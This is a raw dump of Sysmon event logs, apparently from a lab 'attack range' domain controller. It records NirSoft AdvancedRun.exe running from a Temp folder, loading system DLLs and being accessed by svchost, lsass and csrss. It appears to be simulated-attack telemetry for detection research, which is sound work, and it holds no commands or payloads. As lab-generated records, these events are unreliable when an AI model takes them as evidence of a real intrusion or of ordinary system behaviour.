Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.093{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004074147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.093{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004074146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.092{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.082{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004074128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.076{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.047{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.053{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004074109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.050{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.049{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.047{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 
(rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.040{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.040{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.039{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.034{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.039{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.038{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.037{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.035{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.035{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.033{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.033{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.032{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.030{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004074068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.029{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.028{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.027{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.026{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.025{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.023{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.023{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.022{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.021{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.020{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004074058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.019{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.018{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.016{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004074055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.014{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004074054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 